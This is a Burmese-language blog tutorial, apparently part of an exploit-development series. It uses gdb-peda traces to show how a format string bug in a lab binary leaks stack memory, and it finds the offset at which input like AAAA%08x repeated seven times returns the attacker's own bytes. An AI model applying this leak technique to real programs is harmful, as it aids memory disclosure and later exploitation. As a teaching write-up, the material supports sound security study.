EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80484b6 <main+59>: lea    eax,[ebp-0x40c]
   0x80484bc <main+65>: push   eax
   0x80484bd <main+66>: call   0x8048330 <printf@plt>
=> 0x80484c2 <main+71>: add    esp,0x10
   0x80484c5 <main+74>: sub    esp,0xc
   0x80484c8 <main+77>: push   0xa
   0x80484ca <main+79>: call   0x8048360 <putchar@plt>
   0x80484cf <main+84>: add    esp,0x10
[------------------------------------stack-------------------------------------]
0000| 0xffffd210 --> 0xffffd22c ("AAAA")
0004| 0xffffd214 --> 0xffffd831 ("AAAA")
0008| 0xffffd218 --> 0x44 ('D')
0012| 0xffffd21c --> 0x4
0016| 0xffffd220 --> 0x4
0020| 0xffffd224 --> 0x7
0024| 0xffffd228 --> 0x1ad23c
0028| 0xffffd22c ("AAAA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080484c2 in main ()

ဟုတ္ျပီ ဒီေနရာမွာ က်ေနာ္တို႕ တစ္ခုသိထားဖို႕လိုတာေလးရွိပါတယ္။ stack ရဲ႕အေပၚဆံုးမွာသိမ္းထားတာက AAAA မဟုတ္ဘူး AAAA ရွိတဲ့ address ျဖစ္တယ္ဆိုတာေတြ႕ရပါတယ္။

gdb-peda$ x $esp
0xffffd210:     0xffffd22c
gdb-peda$ x 0xffffd22c
0xffffd22c:     0x41414141

push 0xa ကိုလုပ္ျပီးတဲ့ထိ run လုိက္မယ္။ local variable ကို ထည့္တဲ့ေနရာေပါ့

gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0x4
EBX: 0x0
ECX: 0x804b00c --> 0x0
EDX: 0xf7fca870 --> 0x0
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0xffffd638 --> 0x0
ESP: 0xffffd220 --> 0x4
EIP: 0x80484c5 (<main+74>:      sub    esp,0xc)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80484bc <main+65>: push   eax
   0x80484bd <main+66>: call   0x8048330 <printf@plt>
   0x80484c2 <main+71>: add    esp,0x10
=> 0x80484c5 <main+74>: sub    esp,0xc
   0x80484c8 <main+77>: push   0xa
   0x80484ca <main+79>: call   0x8048360 <putchar@plt>
   0x80484cf <main+84>: add    esp,0x10
   0x80484d2 <main+87>: mov    eax,0x0
[------------------------------------stack-------------------------------------]
0000| 0xffffd220 --> 0x4
0004| 0xffffd224 --> 0x7
0008| 0xffffd228 --> 0x1ad23c
0012| 0xffffd22c ("AAAA")
0016| 0xffffd230 --> 0x1ae200
0020| 0xffffd234 --> 0x8
0024| 0xffffd238 --> 0x48 ('H')
0028| 0xffffd23c --> 0x4
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080484c5 in main ()
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0x4
EBX: 0x0
ECX: 0x804b00c --> 0x0
EDX: 0xf7fca870 --> 0x0
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0xffffd638 --> 0x0
ESP: 0xffffd214 --> 0xffffd831 ("AAAA")
EIP: 0x80484c8 (<main+77>:      push   0xa)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80484bd <main+66>: call   0x8048330 <printf@plt>
   0x80484c2 <main+71>: add    esp,0x10
   0x80484c5 <main+74>: sub    esp,0xc
=> 0x80484c8 <main+77>: push   0xa
   0x80484ca <main+79>: call   0x8048360 <putchar@plt>
   0x80484cf <main+84>: add    esp,0x10
   0x80484d2 <main+87>: mov    eax,0x0
   0x80484d7 <main+92>: mov    ecx,DWORD PTR [ebp-0x4]
[------------------------------------stack-------------------------------------]
0000| 0xffffd214 --> 0xffffd831 ("AAAA")
0004| 0xffffd218 --> 0x44 ('D')
0008| 0xffffd21c --> 0x4
0012| 0xffffd220 --> 0x4
0016| 0xffffd224 --> 0x7
0020| 0xffffd228 --> 0x1ad23c
0024| 0xffffd22c ("AAAA")
0028| 0xffffd230 --> 0x1ae200
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080484c8 in main ()
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0x4
EBX: 0x0
ECX: 0x804b00c --> 0x0
EDX: 0xf7fca870 --> 0x0
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0xffffd638 --> 0x0
ESP: 0xffffd210 --> 0xa ('\n')
EIP: 0x80484ca (<main+79>:      call   0x8048360 <putchar@plt>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80484c2 <main+71>: add    esp,0x10
   0x80484c5 <main+74>: sub    esp,0xc
   0x80484c8 <main+77>: push   0xa
=> 0x80484ca <main+79>: call   0x8048360 <putchar@plt>
   0x80484cf <main+84>: add    esp,0x10
   0x80484d2 <main+87>: mov    eax,0x0
   0x80484d7 <main+92>: mov    ecx,DWORD PTR [ebp-0x4]
   0x80484da <main+95>: leave
Guessed arguments:
arg[0]: 0xa ('\n')
[------------------------------------stack-------------------------------------]
0000| 0xffffd210 --> 0xa ('\n')
0004| 0xffffd214 --> 0xffffd831 ("AAAA")
0008| 0xffffd218 --> 0x44 ('D')
0012| 0xffffd21c --> 0x4
0016| 0xffffd220 --> 0x4
0020| 0xffffd224 --> 0x7
0024| 0xffffd228 --> 0x1ad23c
0028| 0xffffd22c ("AAAA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080484ca in main ()

stack ကိုေသခ်ာၾကည့္ၾကည့္မယ္။

[------------------------------------stack-------------------------------------]
0000| 0xffffd210 --> 0xa ('\n')
0004| 0xffffd214 --> 0xffffd831 ("AAAA")
0008| 0xffffd218 --> 0x44 ('D')
0012| 0xffffd21c --> 0x4
0016| 0xffffd220 --> 0x4
0020| 0xffffd224 --> 0x7
0024| 0xffffd228 --> 0x1ad23c
0028| 0xffffd22c ("AAAA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080484ca in main ()

stack ရဲ႕အေပၚဆံုးမွာ 0xa ရွိေနျပီးေတာ့ AAAA ကေတာ့ 0xffffd22c မွာရွိေနတာကိုေတြ႕ရပါတယ္။

putchar ကိုထပ္ေခၚတယ္ အခုမွထုတ္မွာေပါ့ ဒီလိုဆို

gdb-peda$ ni
AAAA
[----------------------------------registers-----------------------------------]
EAX: 0xa ('\n')
EBX: 0x0
ECX: 0xf7fca870 --> 0x0
EDX: 0xa ('\n')
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0xffffd638 --> 0x0
ESP: 0xffffd210 --> 0xa ('\n')
EIP: 0x80484cf (<main+84>:      add    esp,0x10)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80484c5 <main+74>: sub    esp,0xc
   0x80484c8 <main+77>: push   0xa
   0x80484ca <main+79>: call   0x8048360 <putchar@plt>
=> 0x80484cf <main+84>: add    esp,0x10
   0x80484d2 <main+87>: mov    eax,0x0
   0x80484d7 <main+92>: mov    ecx,DWORD PTR [ebp-0x4]
   0x80484da <main+95>: leave
   0x80484db <main+96>: lea    esp,[ecx-0x4]
[------------------------------------stack-------------------------------------]
0000| 0xffffd210 --> 0xa ('\n')
0004| 0xffffd214 --> 0xffffd831 ("AAAA")
0008| 0xffffd218 --> 0x44 ('D')
0012| 0xffffd21c --> 0x4
0016| 0xffffd220 --> 0x4
0020| 0xffffd224 --> 0x7
0024| 0xffffd228 --> 0x1ad23c
0028| 0xffffd22c ("AAAA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080484cf in main ()

ဟုတ္တယ္ AAAA ကထြက္သြားျပီ။ က်ေနာ္တို႕ေတာ့ stack ထဲမွာဘယ္လိုျဖစ္ေနတယ္ဆိုတာေတြ႕လိုက္ရပါတယ္။

အဲ့ေတာ့ ခုနက AAAA%x လို႕ run တုန္းက ထြက္လာတဲ့ address က ဘယ္သူရဲ႕ address လဲ ? ဒါကိုသိဖို႕အတြက္ AAAA%x နဲ႕ putchar ထိ ျပန္ run လိုက္မယ္။

gdb-peda$
AAAAffffd82f
[----------------------------------registers-----------------------------------]
EAX: 0xa ('\n')
EBX: 0x0
ECX: 0xf7fca870 --> 0x0
EDX: 0xa ('\n')
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0xffffd638 --> 0x0
ESP: 0xffffd210 --> 0xa ('\n')
EIP: 0x80484cf (<main+84>:      add    esp,0x10)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80484c5 <main+74>: sub    esp,0xc
   0x80484c8 <main+77>: push   0xa
   0x80484ca <main+79>: call   0x8048360 <putchar@plt>
=> 0x80484cf <main+84>: add    esp,0x10
   0x80484d2 <main+87>: mov    eax,0x0
   0x80484d7 <main+92>: mov    ecx,DWORD PTR [ebp-0x4]
   0x80484da <main+95>: leave
   0x80484db <main+96>: lea    esp,[ecx-0x4]
[------------------------------------stack-------------------------------------]
0000| 0xffffd210 --> 0xa ('\n')
0004| 0xffffd214 --> 0xffffd82f ("AAAA%x")
0008| 0xffffd218 --> 0x44 ('D')
0012| 0xffffd21c --> 0x4
0016| 0xffffd220 --> 0x4
0020| 0xffffd224 --> 0x7
0024| 0xffffd228 --> 0x1ad23c
0028| 0xffffd22c ("AAAA%x")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080484cf in main ()

ffffd82f ထြက္လာတာျဖစ္တယ္။ အဲဒါကဘယ္ကဟာပါလိမ့္ ?

0004| 0xffffd214 --> 0xffffd82f ("AAAA%x")

stack ရဲ႕ ဒုတိယေျမာက္မွာရွိေနတဲ့ addresss ျဖစ္ေနပါတယ္။ ဒီေတာ့ အဲဒါဟာ AAAA ရွိတဲ့ေနရာလား

gdb-peda$ x 0xffffd82f
0xffffd82f:     "AAAA%x"

ဟုတ္ပါတယ္ ။ ဒါဆိုရင္ AAAA ကို ျပန္ leak ဖို႕ဆို ဘယ္ေလာက္ေတာင္လိုမလဲ ?

gdb-peda$ print 0xffffd82f-0xffffd214
$1 = 0x61b

ခဏထားထားမယ္။

gdb ေလးနဲ႕နီးစပ္တုန္း format နဲ႕ျပန္ leak ၾကည့္မယ္။ တကယ္လို႕ ပထမ 8 bits က %08x မွာ AAAA%08x ရွိတဲ့ address ထြက္လာတယ္ဆိုရင္ ေနာက္ထပ္ 8 bits မွာက 0x44 ရွိေနရမယ္မဟုတ္လား ?

root@exploitdev:~/Format# ./fmt_vuln AAAA%08x.%08x
AAAAffffd83d.00000044

ကြက္တိပဲ ။ ဒါဆို stack ေလးျပန္ၾကည့္မယ္

[------------------------------------stack-------------------------------------]
0000| 0xffffd210 --> 0xa ('\n')
0004| 0xffffd214 --> 0xffffd82f ("AAAA%x")
0008| 0xffffd218 --> 0x44 ('D')
0012| 0xffffd21c --> 0x4
0016| 0xffffd220 --> 0x4
0020| 0xffffd224 --> 0x7
0024| 0xffffd228 --> 0x1ad23c
0028| 0xffffd22c ("AAAA%x")
[------------------------------------------------------------------------------]

0xffffd22c မွာ AAAA%x ရွိေနခဲ့တယ္ ။ အဲဒီကိုက်ေနာ္တို႕ leak ခ်င္တယ္ဆို %08x ၇ ၾကိမ္ေျမာက္မွာရွိမွာေပါ့ ။

root@exploitdev:~/Format# ./fmt_vuln AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x
AAAAffffd824.00000044.00000004.00000004.00000007.001ad23c.41414141

ဟုတ္တယ္ အမွန္ပဲ ။ ဒီေတာ့ က်ေနာ္တို႕ format string နဲ႕ Memory leak ျဖစ္တဲ့အေၾကာင္းကို ေသခ်ာသိသြားျပီလို႕ယူဆပါတယ္။ ေနာက္ဆက္တြဲေလ့လာရမွာေတြကေတာ့ ဒါကိုဘယ္လိုအသံုးခ်မလဲ ဆိုတာေတြ က်န္ဦးမွာျဖစ္ပါတယ္။

Thanks

1 Trackback / Pingback

  1. 0x0D – Modify variable using format string – Legion of LOL

Comments are closed.